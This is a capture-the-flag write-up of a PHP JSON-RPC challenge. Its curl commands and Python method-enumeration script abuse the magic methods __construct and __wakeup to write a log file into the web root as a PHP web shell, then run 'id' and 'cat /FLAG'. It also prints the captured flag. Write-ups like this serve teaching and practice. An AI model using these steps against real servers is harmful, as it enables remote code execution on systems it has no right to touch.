RPC was an CURLing (aka web) task for 400 point task description: --- RPC Author: d0znpp Wallarm experts[0] do it in 3 minutes. How long will it take you[1]? Flag format: CTF{..32 hexes..} [0]http://wallarm.com/ [1]http://109.233.61.11:8880/ -- So lets get ourself dirty site welcome us with error: -- Notice: Undefined index: rpc_json_call in /var/www/index.php on line 27 -- quick googleing reveal what rpc-json is, and how it looks like: simple json looks like this: --- {"jsonrpc": "2.0", "method": "mymethod", "params":{"a1":"va1","a2":"val2"}} -- and fires up $obj->$mymethod($val1,$val2) so we need to find some methods;] first one is `test` with parameter `id` --- $ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call={"jsonrpc":"2.0","method":"foo","params":{}}' ; echo invalid method. Try test $ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call={"jsonrpc":"2.0","method":"test","params":{"a":"x"}}' ; echo invalid method params! Valid is: id 42 --- we play a little bit with id, no luck it always return 42 - since it is an answer to everything right? lets find some more methods using some educated queses: -- import requests import json def call_method(m,p): if type(m) == type(p) and type(m) == list: d= [] for m,p in zip(m,p): d.append({'jsonrpc':'2.0',"params":p,"method":m}) else: d = {'jsonrpc':'2.0',"params":p,"method":m} print json.dumps(d) r = requests.post('http://109.233.61.11:8880/index.php',data={'rpc_json_call':json.dumps(d)}) return r.text def check_method(m): return call_method(m,{})[:7] != 'invalid' methods = [ 'test', 'construct','wakeup','sleep', 'toString','to_string','invoke','set_state', 'construct','destruct', 'call', 'callStatic', 'get', 'set', 'isset', 'unset', 'toString', 'invoke', 'set_state','clone' ] for m in methods: if check_method(m): print m if check_method('_'+m): print '_' + m if check_method('__'+m): print '__' + m $ python2 /tmp/r.py test __construct __wakeup --- soo see what we can do about it --- $ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call={"jsonrpc":"2.0","method":"__construct","params":{"a":"x"}}' ; echo invalid method params! Valid is: log_dir debug state --- ok so we can set some state and turn on debugging oh and we now path from previous error message ;] (/var/www) so lets try to write some files -- $ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call=[{"jsonrpc":"2.0","method":"__construct","params": {"log_dir": "/var/www/testing", "debug":true, "state":"pwnd"}}, {"jsonrpc": "2.0", "method": "__wakeup", "params":{}}]' ; echo ...loged $ curl http://109.233.61.11:8880/testing 1391980389 O:3:"rpc":1:{s:5:"state";s:4:"pwnd";} --- nice! lets finish it;] --- $ curl http://109.233.61.11:8880/index.php -d 'rpc_json_call=[{"jsonrpc":"2.0","method":"__construct","params": {"log_dir": "/var/www/t.php", "debug":true, "state":""}}, {"jsonrpc": "2.0", "method": "__wakeup", "params":{}}]' ; echo ...loged $ curl http://109.233.61.11:8880/t.php?x=id 1391980463 O:3:"rpc":1:{s:5:"state";s:22:"uid=33(www-data) gid=33(www-data) groups=33(www-data) --- we have to snoop around file system a bit but eventually flag can be found in / --- $ curl 'http://109.233.61.11:8880/t.php?x=cat%20/FLAG' 1391980463 O:3:"rpc":1:{s:5:"state";s:22:"CTF{b15ffee30a117f418d1cede6faa57778} ";} --- end of story ;]